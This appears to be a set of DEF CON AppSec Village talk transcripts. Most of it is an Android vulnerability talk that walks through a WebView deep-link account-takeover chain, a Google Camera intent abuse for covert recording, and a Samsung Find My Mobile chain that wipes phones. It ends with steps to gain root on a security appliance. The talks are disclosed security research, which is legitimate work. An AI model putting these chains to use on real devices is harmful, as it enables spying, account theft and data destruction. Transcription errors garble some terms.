engaging. And then again, if people go to a meeting that's very boring and they don't like it and it's complicated or it's on a check box, they don't engage. If they don't engage, they don't collaborate, if they don't collaborate, you don't have the magic of the treadmilling. But the treadmilling doesn't work as well as good as they would if people are engaging. So in this case, I have been using factories, I think it's been very successful where I have been done it, but it doesn't need to be a factory. Regardless of what you do for treadmilling, you need to make sure that people involved, they are engaging. They are engaged. They have a good time and they see value on it so they can keep coming back and keep doing these exercises over and over again. Cool. That's all what I had to talk about today. Thank you very much. And I'll see you in the next video.
|
It is a known fact the Empire needs to up their security game. The Rebellion hack their ships, steal their plans, and even create backdoors! In this talk, we will help the Empire by threat modeling the Death Star. Traditionally, Threat Models have been a slow and boring process that ends up with a giant document detailed any possible security problem. This approach, although useful in the past, is not necessarily good in an ever-changing environment (or when you have Jedis as enemies!). I will introduce Attack Trees and how they can fit in nicely in a DevOps world. Come and join the Dark Side! We might save the Empire after all!
|
10.5446/51613 (DOI)
|
Come on in, move to the center of the row, make sure that you get every single seat filled. We want to make sure that we have enough room for everybody to get in. We want to make sure that everybody gets a seat. Get close, get friendly. This is DEF CON. Make friends are some of the things that I wish I could be telling you right now. Unfortunately, yeah, we can't. I'm here and you guys are where you're at, respectively. So with that said, we forge on and the second year of the Apssec Village continues on. For this talk, we've got Pedro Umberlino and Joao Morris to talk about bug foraging in Android. Pedro is a security researcher by day and a hack-a-day contributor by night. He messes around with computers, started on the spectrum. He's been through the bulletin board age. He's been there for the drop of the Internet and still roams around on IRC. He's known on the Internet by his handle, Cryptor, and he likes all sorts of hacks. Joao is a penetration tester and researcher that started with the blue team. Later was attracted to the red side of the force. Although there's more focused in application security, he's learned all sorts of attack factors. So if you would take some time, sit back, enjoy the talk and help me in welcoming these two fantastic presenters. Hello and welcome to the Android bug foraging session. It's great to be here at Defcon Safe Mode Apssec Village giving this talk, despite everything that's happening. It's really good to see the community coming together and make sure this kind of events still happen. My name is Pedro Umberlino. I'm a senior security researcher at Checkmar's security research team. I'm also a security researcher at chair 49. Sometimes I write for Hackaday. One of my hobbies is to make hardware and my daytime job is to break software. I'm giving this talk with a friend of mine and colleague, Joao. Thank you, Pedro. Hello, everyone. Thanks for joining us here today. My name is João Mouraix. I'm a penetration tester team lead for a multinational company. I also do pen testing and security research for other companies. I'm part of the Checkmarx and Char 49 security research team. My background is very wide. I did many different things over the years, always related to security though. In the last years I've been more focused in application security and mobile security, which is exactly what we brought here today for you. We'll hand over the mic to Pedro now so that he can talk to you a little bit about these bug foraging concepts. Thanks, João. Foraging, foraging the act of identifying and gathering wild food in nature. Bug foraging is kind of the same, but you're not in nature. You're in the Android ecosystem. You're not hunting bugs to eat, but you eat because you hunt bugs. Yeah, it's not the same, but you get the idea. Our motivation to do this talk, we wanted to, instead of having a theoretical approach and shared back practices in Android development and so forth, we wanted to share our real life examples of vulnerabilities that we found in our analysis. We wanted to share with you our process of approaching and devising meaningful attack scenarios and proof of concepts. In a nutshell, the overall experience that we have from first crash until disclosure process. For that, we are going to use four different examples of vulnerabilities in different apps that we found. Some of them are from our older work and some of them are going to be disclosed here firsthand. João is going to talk a bit about which vulnerabilities we are going to talk about. João. Thank you, Pedro. Moving on to the agenda, we're all going to present to you four cases, starting with Tinder, the app X, which is an app that we cannot say its real name, Google Camera and Samsung, Final Mobile, the two really well-known apps in the Android world, and then final words, the main key takeaways from this bug foraging experience. Moving on to Case 1, the Tinder application. This is a very well-known application that allows you to meet people and chat with them. The only basic knowledge you need to have about this application is that it will show you pictures of people and you can swipe left or swipe right and you'll actually be saying that you like them or dislike them. If they like you back, you'll have a match and then you can chat with them using the application. Let's start with what we did. We started by sniffing and collecting the traffic and we could see a lot of HTTP going on. HTTP would allow us immediately to know that a certain IP and MAC address was using the application and also allow us to know more. It will allow us to match images with user IDs because you can see there in green that is actually the user ID that is shown in the URL. Also, the image resolution is present you can see in yellow and will allow it to know if that image belongs to the user of the app or someone who is the victim, let's call it victim, is chatting with. It also allows you to see other users so they are in the discovery. Other users that are being suggested to you for you to like or dislike them. Now we have a good visibility, a good invasion of privacy but going a little bit deeper, we can see that in the HTTPS replies from the API, that's why you see the 443 part in the source that's actually the reply from the API and you can see that the size of the payload is very different and that changes accordingly to the actions of the user. So we could do a direct match between the actions of the user and the size of the payload. Of course, we put more 10 or 20 bytes in our parser but it was around 278 for a nope, 374 for a like and 581 for a match. So now we could put all of this together and we ended up with this application, the Tinder drift which is based or inspired in the drift net. And if you have a man in the middle attack going on or if you have some sort of access to the traffic in your network, you could easily identify users of the Tinder application, their MAC address and IP, you could see all the pictures, you can see their picture on the top left, you can see in the center the pictures of users that are being suggested. So they are being shown in his device and also his actions, the notes, the likes and the matches. We also put some traffic down below for debugging purposes. But you can see this working now in this quick video. This video is the Tinder drift software demo. Tinder drift was inspired by drift net and it's a software that passively analyzes network traffic and is able to identify and profile Tinder app clients. So let's start the Tinder drift for the demo. This is the app right here. It receives a pick up file, it can be a live pick up and it still analyzes it. So on our mobile phone we are starting Tinder. And after a while you can see that you already detected which image am I seeing. So Tinder drift takes advantage of the fact that the Tinder app fetches profile images via non-encrypted HTTP connection and it associates that image or those images to a client. After that it analyzes the HTTP encrypted connections from the client to the Tinder API server and infers the behavior of the client by the size of the server responses to that request. So when the user swipes left or right, the app sends a request to the API server, the reply packet size can be used to determine which kind of action the user took if it's a like, didn't like or even if it's a like and it's a match or if it's a super like. So you can see that it takes some time to stabilize and after that the software is able to identify which action the user took. For example, let's like this profile. When you swipe like you can see here in this corner that the image was properly identified as a like and if it's a no like it's a nope. So less like this also. So and you can see that the app updates. The software also supports multiple clients. For example, let's switch to an iPhone. The corporate response was quite fast, but they didn't consider this a big deal in the beginning. We send it up in the news, a massive media storm came that culminated with a US senator saying publicly that Tinder was vulnerable and of course that led to a very quick fix and that was very positive. There was no bounty because at the time as far as I recall there was no bounty program. Let's move on to case two, the app X. This is not really its name, it's just the name we made up because we are not allowed to say its name legally. We can't do it, but that won't be relevant for explaining the vulnerabilities. So let's move on. Starting with what we did. We started by listing activities that could be used by other applications and we found out that the main activity can actually load a malicious URL and that's because there is some link validation, but it's not very strong. I mean you can see the reg X down there. If you have a slash, a L character and a slash, your link is valid and it will be loaded by the web view. So you'll end up with something like this. If you have an attacking application, it can create an intent that will then open the app X, which will then load your malicious content in the web view. We tested that with the activity manager using ADP and it works. So we did actually create an attacking application and we did as well create an HTML page which was exactly the same as the original login page for the app. So a user would not be able to distinguish between the original web page for logging in and our malicious page for logging in and we could steal the credentials and the application would still work smoothly. We tried to leverage these findings. We looked for other things and we found several JavaScript interfaces. As you know, a JavaScript interface is an export of a native Java function and allows the JavaScript in your web view to use it and this particular set base URLs function allows you to change the URL of the API and we can replace it with our own URL. And when you do that, this change is permanent. Your application will contact our malicious API instead of the original API. The app has certificate pinning and it works well but it also supports plain HTTP so we can actually use an HTTP URL and the same with the official API that works either in HTTPS or plain HTTP. So this was the perfect scenario for a man in the middle attack although we still need to trick the victim into install a malicious app. So we tried to go deeper. We saw there were some deep links for this app. Let's consider this scheme. Of course, it's not the real scheme, the app X just for clarity and there is a messaging system in the application. So we were trying to think of a way to send a link in which we could exploit this exactly in the same way but without requiring a malicious application. So the chat feature doesn't support deep links but it supports regular web links and we could actually send a regular web link. The browser would open it. We could redirect to a deep link to the app X schema. But how would we pass the parameter then to the main activity? I mean the main activity would open but it would use the default HTML content and we wanted to be able to pass it our malicious URL. So we ended up with something like this. This is the full chain of events. You can see down there the full URI for the exploit. The app X will open the application and the AF underscore DP parameter will allow us to inject that HTML in the web view. But let's start from the beginning. So we don't need a malicious application anymore. We just need a message and we'll send a message with the web link as soon as the user opens the link. Google Chrome is called. It will request a malicious page to our server and our server will redirect to that full URI that you see down there. So then the Android knows that app X scheme. It will open the app X application and the app X application will load our HTTP attacking dot site dot com. Of course that's a fake domain just for demonstration purposes. You can see the slash L slash so that it will pass the validation and this will work. We have the full exploit just like we did before but without requiring a malicious application. Now the AF underscore DP parameter is something that we found via reverse engineering and you can see there its content will be loaded in the web view. So summing this up when the victim clicks in the link the attacker can steal its cookies impersonate. So take over the account monitor all the application activity read private messages you can track the victim to its geographic location because the app has this feature and it can also create a wormable exploit well where all the contacts will receive a malicious link and by each contact that presses on the link it will send it to all the contacts of that contact and so on and so on. So becoming a sort of a wormable exploit. And consider that the application will always behave normally to the victim's eyes so you won't know is actually being act. I was going to show you a quick video demonstrating but there was some crash on our BLC player so I'll just move on to the corporate response. So the response was good, it was fast, it was classified as a critical issue, it was fixed. There was no bounty because I think there was no bug bounty program at the time but there was some legal issues. This wasn't good and we could avoid this but we'll talk about this in the final words section and now I'll hand over to Pedro so that he'll talk to you about the Google camera application. Pedro? Thanks, Rob. Now we are going to look into case number three which is the Google camera. The Google camera app comes installed in millions of different devices and this was a research that comes in the context of an audit to the Pixel 3. Sometimes instead of looking into a specific application we just choose a vendor and buy the latest phone and start to look into the pre-installed applications that come since this implies a bigger attack surface and more users that could be at risk. In this case we were focusing on the Google camera app. Now the process is kind of the same when you do Android reversing for a while, you just list the activities and broadcast receivers and so forth that you can call without permissions, you reverse the APK, you analyze the traffic, you start reading the code so in this case there was a lot of exported activities and defined actions inside the Google camera app. Now we started to test the behavior of these activities and actions and look for interesting stuff because sometimes it's easier just to start and test the behavior of the application instead of reading tons of reversed code sometimes off-scaled. So we noticed that there's this action called video camera that starts the Google camera app and immediately starts recording and we found that interesting because there is also this action video capture that does not start recording. So why were there two different ones? Any other action would open the Google camera in photo mode but does not take a picture. So we are looking like the attack scenario here is a rogue application that's trying to control the Google camera application. So we map out which classes handle which intents and which actions and then you start reading the code and try to figure out if there's any extras or data or actions that you can pass to the program and to the application and modifies the execution path or the behavior. So we noticed at least three interesting extras. One is called use front camera which allows us to the controller app to choose if the Google camera is going to use the front camera or the back camera. There was this duration seconds which allows the camera to start a timer before taking a picture and this obscure one called extra turns screen on which essentially does what it says it does. It turns the screen on. Now why was this interesting? Because the timer duration seconds for example starts the Google camera app and also starts the timer. So you could take video without user interaction and now we figure out a way to take a photo without user interaction if you use a timer. The minimum default timer is three seconds. It's hard coded but still you can take photos without user interaction. And the extra turns screen on was very interesting because it makes the camera app to open even if the phone is on standby or even if the smartphone is locked with a pin number. So you can actually start from the background start the Google camera and take a picture and record a video. Now why is this interesting? Because usually the videos and the photos are stored on in the SD card and the SD card as you know it's easily accessible by other applications that have the read external storage permission. So we started to think how can we leverage this in a meaningful attack scenario. So we devised with this combination now you can make a rogue app, take a picture, record a video without user interaction even if the phone is locked. And the big problem here is that this rogue app does not need permission, does not need camera permissions. It just abuses the Google camera app to take these actions for himself. So we devised a POC called Spixel. It's a client server architecture like the client is a rogue weather app. It only needs the read external storage permissions and the internet permissions to communicate with the command and control server. The command and control server is a listen for every client and has a bunch of interesting features. Now the command and control server can order the rogue app to take a photo or take a video from a chosen camera. It uses some style features that we developed to prevent that the Google camera app is popping up or making a sound. We can mute all the audio streams. This was actually another topic that we submitted to Google because it was not supposed to be possible to mute the phone without permissions to do so. It's another bug. We monitored the proximity sensor to know if the phone is upside down or not or you are on a call. We devised a feature called auto record calls. When you answer the phone and you put the phone next to your face it starts recording. And it's actually possible to listen to conversations in both sides. If exit data is on you can grab the GPS locations and locate the user like you can issue the camera to take a photo and then pass the exit data and grab the GPS position. This is not completely related to the vulnerability in itself but we kind of get creative and implemented this on the tool among other features. Now we are going to see a demo. This demo shows the auto record feature when David answers. You can see on the right side the image from the camera. Superimposed. And this is the attacker side when it actually receives the video and plays it back to the attacker on the Spixel interface. So the corporate response here was really standard for Google which is really high for everyone else. So we got a medium fast response after the first report. This was classified as a medium impact vulnerability. Then we shared our tool and an explanation of what we did and how our tool could bypass a locked phone. And then they classified as a high impact vulnerability. The response from then on was really really fast. They contacted other vendors that were identified as using the Google camera or a byproduct of Google cameras and derivatives. There were also other companies affected and in the end Google granted a 75K USD bounty. Which was really cool. So now we reach our last case which is case number four, Samsung Find My Mobile. Now Find My Mobile is an application that works together with a website that a Samsung account owner can use to locate his phone if it's lost. He just log into the website, make the phone ring and lock the phone and whatever. So this was researched in the context of an audit to a Samsung S8. Also looking into default install applications and try to figure out if there's some vulnerabilities there. Now the process is kind of the same, list the activities, try to find some things that are reachable by other applications without permissions, reverse the APK, analyze the traffic and so forth. There was not much luck involved at first. But digging a bit deeper, there's some piece of code that didn't even be compiled correctly that refers to a file in the SD card called fmm.propp. Now this was an interesting file to know and after reversing it was possible to understand that the program would load the mg.url and dive URL from this file if the file existed. So this location, since it lives on the SD card, allows a malicious application to create this file and fmm will use it and will communicate with a back end mg server. Now there are going to be a lot of servers in this example, so the mg server is like the management server and we can control it if we create this file and pass it a URL that you want. But creating this file is not enough. You must force fmm to assume this file. Usually this happens at buddha, but it's not really interesting if you cannot control it. So this was vulnerability number one and now vulnerability number two comes from a broadcast receiver. So there was this broadcast receiver called PCW receiver that when it receives the action that registration was completed it will proceed to update URL. So what this means in practice is that by sending a message to a broadcast message to this PCW receiver, fmm gets signal that the registration is completed and then it contacts the mg server to perform this registration again and this mg server is the URL that we already under control in vulnerability number one. Now this is interesting because by pointing the mg URL to an attacker control server and forcing this registration with vulnerability number two, we can get a lot of details about the user because the phone contacts our own server and then we can get the course location via via e-pay address, registration ID, iMay, there's a lot of information that comes with this registration request and so joining these two vulnerabilities together we can effectively found a way to monitor a user remotely. This all happens in background and the user has no way of knowing this is happening. So but this is kind of not enough. I didn't want just to monitor users, I want more. So by analyzing the original mg server response we can see that the response comes with a lot of different URLs. There's like this DM server, DS server, OSP server. I didn't get to the bottom of all servers what they all work for and what they are for but it was nice to see that we can also control the other endpoints and this allows us to go and talk about vulnerability number three. Now the vulnerability number three exists in another receiver called the SPP receiver and there's this magic action that you can see there that's fb0bd so hexadecimal string that indicates to fmm if there was a push message received. Now by sending a broadcast with this magic magic action we can additionally add an extra with the push messages. There was a lot of work involved in reversing these messages they are all encrypted then it's kind of hard to read but luckily the key was encoded in the code and we don't even have to understand what are all these messages for. We just need to know if we can craft the proper message then we can get fmm to talk with the DM server. Now while the mg server seems for registration processes and delivering reports the DM server actually stores the actions that the user performs when he logs into the website or to the web interface. Now the website you can find it in findmymobile.samsung.com has a map and has an overlay and the user can log in and perform depending on the API level you can perform a lot of actions you can ring the phone you can lock the phone and leave a message create a backup retrieve call logs and SMS's erase all data on the phone so there's a lot of different actions that you can make on the web interface. Now they are executed by the phone when the phone receives these messages but the phone could be offline or somewhere without network access so it's possible for the attacker to send the broadcast to this SPP server that results in fmm contact this DM server and searches for pending actions that were taken and fmm didn't have network connectivity to perform those actions. Now this communication uses a proprietary sync ml implementation which was a bit hard to figure out it's not like standard sync ml to the best of my knowledge and there's something called odd MD5 on this on this communication so I assume there was some kind of authentication going on and encryption so what happens is it's when the fmm contacts the DM server the DM server can just reply with a okay or the accumulated actions that were requested and missed while the smartphone was offline and this is where you can come in because we actually because of vulnerability number two we actually control the DM server so we control the energy server and the DM server but to be able to perform something like closely remotely resembling a man in the middle attack we need a valid certificate you need to monitor the messages you need to detect the message types change the request on the fly and you have to bypass this sync ml outd5 mechanism at the same time to make everything works so now we are going into vulnerability number four which is the sync outd5 algorithm so it has nothing to do with MD5 weaknesses the authentication protocol seems to be like the client connects to the server and sends a field sync ml outd5 on the first request I assume this is a challenge the server responds with another outd5 field which I it's only depends on the client challenge original client channels in the IMAE I assume it's a response and then the client now sets all server replies from now on why is this important it's because there is no message signing on or any mechanism that prevents message modification which is really great for an attacker in the middle position so I you know you don't even need to reverse the response verification mechanism to make this work you can just man in the middle the connection and send the authentication the challenge packet to the server grab the response send to the client and then you can just use that token and communicate because there was you can change the content of the packet because there was no you know message signing so to putting it all together if you put all these vulnerabilities together so with vulnerability number one you can use the fmm prop file to change the ng server to your own server then you send a broadcast to the pcw server receiver and then you can get the mg server that has all these actions stored and force the update via a spoof response then you send the another message another broadcast message to the spp reserver receiver that actually makes fmm contact the dm server and fetches any outstanding actions you are in the middle of this connection so you just forward back you forward the challenge packet to the original server grab the response and then inject your own actions in the client since there's no message integrity here and then the smartphone can actually execute whatever message you decide for him so you know the too long didn't read version is that any application could reset your phone stealer messages look at you know look locate the user anything that fmm supports and depending on the api level any application without permissions except to actually use the sd card which is one of the most common permissions you can do whatever that fmm support it work on the wide range of devices including the s7 e s8 the s9 plus this was tested on a lot of devices and we have a demo that we can show now so I can actually claim that I'm able to you know erase all contents of the phone without actually showing it so here's the server configuration files I'm going to switch my action to nuke this video is a bit sketchy I'm sorry I cannot record the mobile phone screen at the same time so here's a Samsung s8 don't look it I'm going to start the POC and over here I'm I'm telling the logs of the rogue server so I'm going to do the exploit step by step this is the first step which changes the fmm prop this is the second step as you can see here you can already watch that the rogue server receives the register requests so the url endpoints now should already be taken over here and now when I'm going to do step 3 it's going to contact the sync server the dm server and but it's already spoofed so the reply would be will be a nuke and you can see it happened in real time here and kabam bye bye dear s8 so it's the same thing that happened on the other video but the action is actually different the action is is the erase so the phone gets erased also the sd card is formatted so all that in the in this phone is lost that's it here you can see the different steps here so there over here there's a step one then you get this is where the authentication gets stolen from from the server there will reply to the to the phone it is injected with with it to be wiped it's hard to see here but so we're here to be wiped and then a series of steps that are needed to actually make the phone erased so working with Samsung in the Samsung bounty program they are very organized and they were they will issue the fast fast response after the first report this was classified as a high impact vulnerability and then we are we realized there was a lot more into it this this kind of behavior affects many different parts from the application of part the web server part there are some things that needed to change it took some time until they could issue a proper fix and they granted the 10k usd bounty and in addition there were some closely related critical for flaws that are not in the scope of this talk it's not that application side so it was added a 25k usd bonus so in the end it was very very nice so this concludes our presentation we try to give you a variety of examples of real applications that faced different problems like lack of encryption problems in web views legacy code intense without permissions these are all different issues that sometimes are common to other applications or some of them are very android specific before we go we'd like to just say some some words we really believe that we're trying to make the world just a slightly better place by you know identifying these vulnerabilities making people overall a bit more safe while being online luckily we we are paid for this research and we're not depending on bounties but of course they are always appreciated it's interesting to note that the vulnerability complexity does not you know equal having a greater impact or more rewards sometimes you spend a lot of time trying to develop a POC or a working POC and on a very complex issue other times you just find a very simple bug that has a lot of impact and does you can usually get a higher reward if you are in it for the bounties and the final word is that we are really a friend we are not the enemy we are trying to help companies making a better product sometimes products that we actually use and we have a complete interest in making the product better and you know threads and lawyers are legal suits are really not necessary we are we are we think of ourselves as friends and we are not trying to hurt the company's image or whatever in any way so I think now we are going to be open for questions if anyone wants to ask something thank you.
|
In this session, we will analyze four real-world examples of different high impact android vulnerabilities. We will show how we discover, developed, and leveraged the vulnerabilities into a fully working proof-of-concept, devised meaningful attack scenarios (demos included), and how our work was approached by the different vendors.
|
10.5446/51614 (DOI)
|
Alright folks, it's almost the end. But here we are again. Wanted to take a quick second and give a big thanks to our 2020 sponsors that's check marks, Google and Offensive Security. Thank you all so much for helping to make the AppSec Village happen. We could have done it without you. If you haven't gotten your shirt yet, go to AppSecVillage.com and pick up your t-shirt. Also if you're interested in making sure that this is a lasting thing, go out and become a super fan for us. That would go a long way towards helping to make sure that hopefully if next year's DEF CON is in person, AppSec Village will be part of it. Alright, without any further introduction or me talking, we are going to hear a talk from Mehmet Ines, managing partner at Invictus in Cyber Intelligence. He's going to be talking about a haven for hackers, breaking a web security virtual appliance. With that, please help me welcome to the stage Mehmet. Let's talk about finding a zero-day vulnerabilities. In that presentation, I'm trying to take you all to the journey with me to finding different vulnerabilities in a security solutions and combination of them will give us a remote code execution with a root user. This is Mehmet. I've been doing vulnerability researching since 2005 when I'm working for a company in Invictus Cyber Security Intelligence. This is my Twitter address, mdisec, and PanTest.blog is a web page where me and my teammates are sharing our technical research in here. Okay, so haven for hackers third edition. Actually there's a story behind that title and it has started back in 2017. I was doing a PanTest thing for a company and there was a blue team members and they were telling me you are doing this, et cetera, and I was start thinking about what happens if we somehow manage to break into your same product that they are using and write a custom rule in order to become a totally invisible. Because they are telling us what they are seeing in the product and if we become invisible, that would be so nice. That idea led me to defining a remote code execution on a various different C-Mandalog management solutions back in the 2017. After one year, I was trying to send an email to a friend of mine and that dude was not receiving any email from me at all. It turned out that there was a problem on the email security gateways and they managed to solve the problem and eventually we started sending an email to each other. I was thinking that all right, there is an email security gateway products and what happens if I manage to break into your email security gateways so that I can read all the emails incoming and outgoing. That idea motivated me to finding a remote code execution vulnerabilities on Simantec, Micro Focus and the Trank Macro. And previous year, I was working at another client and the project was hardening the client's network in order to finding data exaltration scenarios. They were telling me we have the web security solutions and only that device can connect to the internet so all the clients has to go through that box. If you find a different way to exaltrate the data, that would be nice. I was like, okay, so what happens if you find another zero-day vulnerability on especially the web security and the content filtering solutions so when the attacker managed to execute a code on the client network for the data exaltration and the CT communication phase they can exploit the content filtering solutions. So this is the two days topic. We are going to talk about these really vulnerabilities that I found on a very interesting product. And I have a case study for you. There is a product from the Trank Macro interscam web security virtual appliance and I have done the vulnerability research on specifically that solutions and we are going to see what kind of vulnerabilities that I managed to find and using all of those vulnerabilities together, we are going to see some sort of code executions in the end. But before diving into the case study, I would like to talk about what is the content filtering in order to make it crystal clear to everyone. As you can see in the picture, there is a computer on the left which represents a client's network of the company and those devices don't have a direct internet access. They have to go to the proxy service first and that proxy service goes to the internet so that the organization can do some sort of analysis and the rules on the client's network. So content filtering is happening in here right now. We can imagine that the content filtering solutions, they are kind of spatially implemented proxy service and the term is given to do controlling the type of web content that employees, guests, customers can access while they are connected to the business wired or wireless network so that the business may want to apply control over the type of content that can be accessed to stop employees by restricting accesses to certain type of web pages. And on top of that, also the content filtering is a quite a good place to ensure malicious web pages cannot be accessed such as those used for phishing, malicious, distributing malware, etc. So we are targeting that kind of products in this presentation. So at the beginning, I was like I have a too many motivation like a targeting web filter solutions. Why we are doing this? And first and foremost, obviously, all the clients network are going to the internet through that solutions. That means if we manage to break in, we're going to see the whole clients network internet traffic of the organization. And second motivation is as I told you before, clients computer don't have a network access to the internet. They must go through the web filter. So we need to find a better way to see communication in the red teaming scenarios. And I believe that filter solutions is a quite a secure and stealth way to make a city communication. Of course, there is a loss of difference approach like a DNS beginning, etc. etc. But I believe that is a very secure and stealth way. So all right, that is the brief introduction to do idea and the main motivation. And this is the methodology that I usually follow for my vulnerability research projects. And there is a seven steps and we're going to see every single step in details throughout the case study. And first and foremost, we have to find a way to get a free trial of the product that we're going to do vulnerability research on it, because you have to, you know, break into operating system level, and you need to find all the source going on, etc. etc. And you have to test your vulnerabilities and eventually you're going to implement the exploit for the one of these you found. So you have to find a way to get a free trial. And it's not quite easy guys always. It's not quite easy. It's sometimes and most of the times it requires to have a loss of meeting with the sales team and if you find them, if you find the free trial of the product, I strongly suggest you to start by reading the documentation because there is administrative documentation of these type of solutions and there's a huge technical information about the product itself. So after that, we are going to find a way to have a route SSH access to the box because we are going to do the vulnerability research. And most of the case, there is operating level hardening and we need to get rid of all of those, you know, hardening stuff. And after that, you know, you are in a situation where you manage to install the software, I mean the solution, you read the documentation and you manage to overcome the operating level system hardening. And that is the moment that you need to start using product itself like a regular user, because you have to understand all the features because those information will become so handy when you need to define a possible attack vector. So after that, we are going to talk about the enumeration and the configuration step. And the most important phase is the defining possible attack vectors because you got all the information you need. It is a time to building attack scenarios and then find a vulnerability is a final step. We are going to see everything step throughout our case. And in that case, I mean the trunk micro interest again, web security, virtual appliance 6.5 version, you can do a lot of it from the vendor web page. So getting a free trial was quite easy in specifically in that case. If you go to the Google and looking for the administrative documentation is an important keyword in here for the Google search. You can directly find the administrator file, which is usually like a 300 pages. I strongly suggest you to read administrative documentation because you're going to see very, very helpful information about the product. As you can see in here, administrative documentation tells us there is a different modes of the product. It can be transparent breach mode. It can be transparent breach mode with high availability, forward proxy, reverse proxy, ICAP, WCCP, etc., etc. So that product can be installed very different modes. And on the right side, you are seeing the forward proxy mode, which tells you that product can participate in a proxy change, forward all the traffic to the upstream proxy servers. And you will be seeing lots of graphics on the administrative documentation, which will help you to understand about the product itself. So we are reading the funny manual as well. And we, of course, for the third step, after the reading the documentation, you need to install the solution into your visualization system. During the installation, there was an admin user and password has been set during the installation and the product gives you an opportunity to do SSH connection to the box with the administrator user. But the problem is there was a restricted shell on the SSH. There is a very, very limited tools that you can use in the SSH interface of the product. And we need to find a way to have a directly SSH connection with the root user, because we are going to do remote debugging. We want to try to find out all the source codes and we're going to do further analysis, etc., etc. So there is a little bit of a step before starting to the vulnerable to research. In that case, it was quite easy because the product was distributed by the vendor as an ISO file. So you can directly install it into your VMVural VirtualBox. And when you finish the installation, the idea is you can detach the VMDecard disk from the virtual machine that you just installed, and then you can attach it to the difference in the next machine. And then you're going to mount NIVDisk and you are going to find a graph file, because there was a password protection on the graph file. And I want to get rid of that protection as well. And you just need to remove the password protection line on the graph file. And after that, in order to get rid of the restricted shell thing, you can go to the shtconfig file and you can enable the remote root login. And if you do that, you need to go to the.etc.paths.vd file and add BimBesh for the root user, which will give us a direct SSH connection with a root user without having any restricted shell at all. And we have to undo every single thing that we have done so far. So that means you need to unmount the disk, detach the VMDecard file, and attach it back to the original VM and reboot the machine, actually. And in that case, you are going to have the direct root SSH connection to the box. This is important. We need to get rid of operating level hardening. So we are kind of ready to start using product itself. In that case, I choose the reverse proxy mode, but I believe all the vulnerabilities that we have found exist no matter what is the installation mode at all. And for the first step, I certainly suggest you to use a product for a day to get used to about the features itself, because there is a lot of functionalities you can see in the picture. There is a URL access control, actually, the decryption. Right now, we know that product can offload to SSL at all. That means we can deploy SSL through the administrator interface. And there is an advanced threat protection on the left side of the menu. As you can see, I hope you are seeing my mouse pointer in here. There is an advanced threat protection. That means all the HTTP or HTTPS traffic will be analyzed by the product in order to find out malicious activities because of that feature. So later of that presentation, guys, we are going to see how important it is to understand and getting familiar with the product interface. It's quite important. Just use it like a normal user. So we have such access with a root user. So the initial step is always enumerating the services. This is what I'm doing. Of course, that would be a better way to do it, but this is my way to do. So I always looking for the nested command to find out what kind of services we have in the product itself. As you can see in here, there is a UWSGI, which lists in support 611. That means we are doing some sort of assumptions in that phase. So that most probably means there is a Python project running in the internal system. And there is a Java process which lists things exact port of the administrator interface. That means we are going to deal with the Java when the time comes to do doing a research on the administrator interface. There's another UWSGI in here. And that is another important thing because as I said before, that product acts as a proxy service. So that must be as some service on the product itself in order to handle incoming HTTP connections from the user. So I ask IWSSD process that you are seeing in here, which lists in support 8881. This is responsible for all the incoming connection from the client's network. So this is the majority part of the product itself because that is the one who is communicating with the clients. All right. So those are the services that we have in the product, but we need to find which of those services are allowed to communicate with the different computers in the network because in the end, we need to explain at least one of those services. So what I'm doing for to find out that information, I usually run an M-Mapscan from my main host to the product IP address, or you can just use the IP table slash this command to find out the IP table's rules. So according to that rule, most of the internal services has been forbidden to network traffic from the outside of the machine. You guys are remembering the IWSGI service. If you keep doing enumeration, we are seeing very interesting information in here. As you can see in here, there is a supervisor, the which responsible for starting the solar service. So right now, we know there is a purchase solar and lots of Python services in the box. So what is a purchase solar? It is an open source enterprise search platform written in Java. It's a major feature is included full tech search, highlighting the time indexing, dynamic clustering, et cetera, et cetera. So that means that Python project that we are seeing in here is responsible reading and writing the log file into the purchase solar service. So most probably, whenever the request comes to the proxy service from the client's network, the proxy service is sending some sort of signals to the Python project that we have seen in here. It's something like an internal microservice. So that Python project is taking the information and writing it into the purchase solar service. So whenever the administrator user tried to query something through the administrator interface, that request will be coming to the Python project as well, because the naming convention in here is the dashboard parse, main, starts parse, summary parse. There's a lot of log parsing and writing to those purchase solar service. And whenever it needs to be the access by the administrator interface, that Python project is taking the responsibility again. So it is quite important to know there is a purchase solar service within the box. But unfortunately, due to the IP table's rule that we have in here, we're not going to be able to directly communicate with the purchase solar at the beginning. But later on the presentation, we will find a way to do it. So all right, let's talk about IOS, IWD SSD process. If you grab it from the process three, you are seeing the full path of the binary. And if you look for the file type, it is a symbolic link to the IWD SSD process, which is SUID LFI binary. And there is a 61 module in that binary. So it's a very huge binary. And we can, of course, target that process, but it will be requiring lots of reverse engineering. So of course, we are going to do that at some point. But one of the most important attack servers, as you can imagine, it is a process service itself. So so far, I believe I just spent 20 minutes, I guess, and we managed to collect enough level of information about product itself. So it is time to define attack vectors in a light of those information that we got so far. So we know that administrator interface is written with Java. And there is a process service, which is written with C++. I haven't told that before, but it is a C++ guys, this is my bad story. And there is a loss of internal services, but most of them are not accessible from outside of the box. And you guys are remembering SSL decryption and advanced threat protection features of the administrator interface. So we know that it does offloading SSL, it parsed HTML contents, scams files, et cetera, et cetera. So my idea at that phase, my idea was, OK, let's start with the administrator. We can go after process service if it needs to be. Let's start with administrator interface at the beginning. But there is a loss of possible attack scenarios, as you can imagine. If you want to, let's say, target the HTML parser of the product, like a browser exploitation, you can just send that phishing email to one of the employees of the company that contains a link. Whenever the user clicks on that link, that request will be sent to the process service. And process service is going to take that request from the clients. And it's going to send exactly the same request to the destination server, which is a web page that attacker can control. And whenever the process service gets the response, it performs analysis. It has to parse HTML content as a scandal file. So that means you can directly attack to the HTML parser engine of the product. There is a loss of difference possible attack vectors. That was just one example that just popped in my mind right now during the presentation. We are going to talk about the administrator interface. And then we're going to talk about the process service. You know, as you know, it is a Java project. And I like to working on the Java project. And every single time, whenever I'm facing with a Java application, I always start by reading the configuration file. Because the web.xml, Strat-Strat.xml, all of those XML files contain a very good high level of understanding information about the software that we are going to do. Vulnerability research. And I don't want to live in an SSH connection during wall vulnerability research. So we need to find that all the location of the jar file by using just find comment on the step two. And then you can copy all of them to your main host to further analysis. Because we are going to deal with lots of jar files. And I strongly suggest you to use IDEs. I used to use GDI for the compiling of the jar files. But those kind of projects has hundreds of different jar files. And if you put all of the jar files into the GDI, why it wasn't working for me, it was just crashing or freezing, because it has to compile all the class and the functions and they need to find all the cross calls. So I strongly suggest you to use IntelliJ or Eclipse for that purpose. And if you are up to use the IntelliJ IDE, there is a Java compiler.jar file under the compiler library, which comes by default with IntelliJ, I guess. And you can compile all the jar files under the lib folder. You can change the name, of 